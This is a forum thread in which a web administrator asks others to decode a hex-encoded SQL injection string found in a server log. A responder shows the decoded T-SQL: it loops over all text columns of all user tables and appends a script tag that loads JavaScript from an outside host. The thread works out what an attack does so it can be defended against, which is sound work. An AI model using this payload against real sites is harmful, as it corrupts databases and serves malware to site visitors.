worthyking
asked on
SQL Injection (new?)
Recently we have seen a sharpincrease in the amount of attempted SQL injection hacks on our web servers. I found the below in the server log last night. this looks a lot more sophisticated than the sql injection hacks I have seen in the past. Can anyone translate this for me?
page_name.asp?zone=8&Refre sh=0&HT=ht tp;DECLARE %20@S%20VA RCHAR(4000 );SET%20@S =CAST(0x44 45434C4152 4520405420 5641524348 4152283235 35292C4043 2056415243 4841522832 3535292044 45434C4152 4520546162 6C655F4375 72736F7220 435552534F 5220464F52 2053454C45 435420612E 6E616D652C 622E6E616D 652046524F 4D20737973 6F626A6563 747320612C 737973636F 6C756D6E73 2062205748 4552452061 2E69643D62 2E69642041 4E4420612E 7874797065 3D27752720 414E442028 622E787479 70653D3939 204F522062 2E78747970 653D333520 4F5220622E 7874797065 3D32333120 4F5220622E 7874797065 3D31363729 204F50454E 205461626C 655F437572 736F722046 4554434820 4E45585420 46524F4D20 5461626C65 5F43757273 6F7220494E 544F204054 2C40432057 48494C4528 4040464554 43485F5354 415455533D 3029204245 47494E2045 5845432827 5550444154 45205B272B 40542B275D 2053455420 5B272B4043 2B275D3D52 5452494D28 434F4E5645 5254285641 5243484152 2834303030 292C5B272B 40432B275D 29292B2727 3C73637269 7074207372 633D687474 703A2F2F77 77772E6368 696E61626E 722E636F6D 2F622E6A73 3E3C2F7363 726970743E 2727272920 4645544348 204E455854 2046524F4D 205461626C 655F437572 736F722049 4E544F2040 542C404320 454E442043 4C4F534520 5461626C65 5F43757273 6F72204445 414C4C4F43 4154452054 61626C655F 437572736F 7220%20AS% 20VARCHAR( 4000));EXE C(@S);--
p.s. HT=http is the last actual URL parameter. After that the malformed URL begins.
page_name.asp?zone=8&Refre
p.s. HT=http is the last actual URL parameter. After that the malformed URL begins.
See http://dev.mysql.com/doc/refman/5.0/en/cast-functions.html
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
it sets all the values in all the columns to <script src=http://www.chinabnr.com/b.js></script>
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name
FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.chinabnr.com/b.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
ASKER
Thanks! I should have tried that first, but I have not run into sql queries in binary before.
ASKER
Thanks all!
Geert_Gruwez: sorry, I had already accepted the solution before I refreshed and saw your post.
Geert_Gruwez: sorry, I had already accepted the solution before I refreshed and saw your post.
no problem, now i know that sql injection is possible too :)